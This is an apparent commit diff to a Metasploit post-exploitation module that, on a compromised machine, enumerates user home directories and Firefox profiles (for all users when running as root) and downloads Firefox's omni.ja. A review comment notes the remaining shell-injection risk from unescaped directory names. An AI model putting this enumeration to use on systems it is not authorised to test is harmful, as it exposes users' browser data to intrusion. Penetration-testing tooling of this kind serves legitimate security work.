Try harder to get user id, correctly handle dirs with spaces.

Fixes #7817.
bug/bundler_fix
Pearce Barry 2017-02-20 11:32:20 -06:00
parent dad21b1c1d
commit 37066acc03
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
1 changed files with 22 additions and 12 deletions


@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
omnija = read_file(@paths['ff'] + org_file)
if omnija.nil? or omnija.empty? or omnija =~ /No such file/i
print_error("Could not download: #{@paths['ff'] + org_file}")
print_error("Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading)") if session.type != "meterpreter"
print_error("Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)") if session.type != "meterpreter"
return
end
@ -249,8 +249,8 @@ class MetasploitModule < Msf::Post
if got_root
vprint_status("Detected ROOT privileges. Searching every account on the target system.")
userdirs = cmd_exec("find #{home} -maxdepth 1 -mindepth 1 2>/dev/null").gsub(/\s/, "\n")
userdirs << "/root\n"
userdirs = "/root\n"
userdirs << cmd_exec("find #{home} -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
else
vprint_status("Checking #{id}'s Firefox account")
userdirs = "#{home + id}\n"
@ -260,16 +260,16 @@ class MetasploitModule < Msf::Post
dir.chomp!
next if dir == "." or dir == ".." or dir =~ /No such file/i
@platform == :osx ? (basepath = "#{dir}/Library/Application\\ Support/Firefox/Profiles/") : (basepath = "#{dir}/.mozilla/firefox/")
@platform == :osx ? (basepath = "#{dir}/Library/Application Support/Firefox/Profiles") : (basepath = "#{dir}/.mozilla/firefox")
print_status("Checking for Firefox profile in: #{basepath}")
checkpath = cmd_exec("ls #{basepath}").gsub(/\s/, "\n")
checkpath = cmd_exec("find " + basepath.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
checkpath.each_line do |ffpath|
ffpath.chomp!
if ffpath =~ /\.default/
vprint_good("Found profile: #{basepath + ffpath}")
paths << "#{basepath + ffpath}"
if ffpath =~ /\.default$/
vprint_good("Found profile: #{ffpath}")
paths << "#{ffpath}"
end
end
end
@ -332,7 +332,7 @@ class MetasploitModule < Msf::Post
profile = path.scan(/Profiles[\\|\/](.+)\.(.+)$/).flatten[0].to_s
profile = path.scan(/firefox[\\|\/](.+)\.(.+)$/).flatten[0].to_s if profile.empty?
session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("ls #{path} 2>/dev/null").split())
session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("find "+ path.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type f 2>/dev/null").gsub(/.*\//, "").split("\n"))
files.each do |file|
file.chomp!
@ -551,12 +551,18 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
when :unix
# Assuming userdir /home/(x) = user
print_status("Enumerating users")
users = cmd_exec("ls /home 2>/dev/null")
if users.nil? or users.empty?
homedirs = cmd_exec("find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null").gsub(/.*\//, "")
if homedirs.nil? or homedirs.empty?
print_error("No normal user found")
return false
end
user = users.split[0]
user = nil
# Skip home directories which contain a space, as those are likely not usernames...
homedirs.each_line do |homedir|
user = homedir.chomp
break unless user.index(" ")
end
# Since we can't access the display environment variable we have to assume the default value
args.insert(0, "\"#{@paths['ff']}firefox --display=:0 ")
args << "\""
@ -719,6 +725,10 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
session.sys.config.getuid =~ /SYSTEM/ ? true : false
else # unix, bsd, linux, osx
id_output = cmd_exec("id").chomp
if id_output.blank?
# try an absolute path
id_output = cmd_exec("/usr/bin/id").chomp
end
id_output.include?("uid=0(") ? true : false
end
end
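Review bot: The new `find` invocations escape only spaces with `gsub(/ /, "\\ ")`, so a directory name containing any other shell-significant character (quotes, `$`, `;`, `&`, parentheses, a newline) is still interpreted by the shell that `cmd_exec` runs. This applies to the `checkpath = cmd_exec("find " + basepath.gsub(...))` line and to the non-meterpreter branch of the `files = ...` line. These names are read from the inspected host's file system and should be treated as untrusted input to the command string. Quote the whole argument instead, e.g. `checkpath = cmd_exec("find #{Shellwords.escape(basepath)} -maxdepth 1 -mindepth 1 -type d 2>/dev/null")`, and do the same for `path`. `Shellwords` is in the Ruby standard library, but whether this file already has it loaded is not visible here, and the enclosing methods start and end outside the hunks.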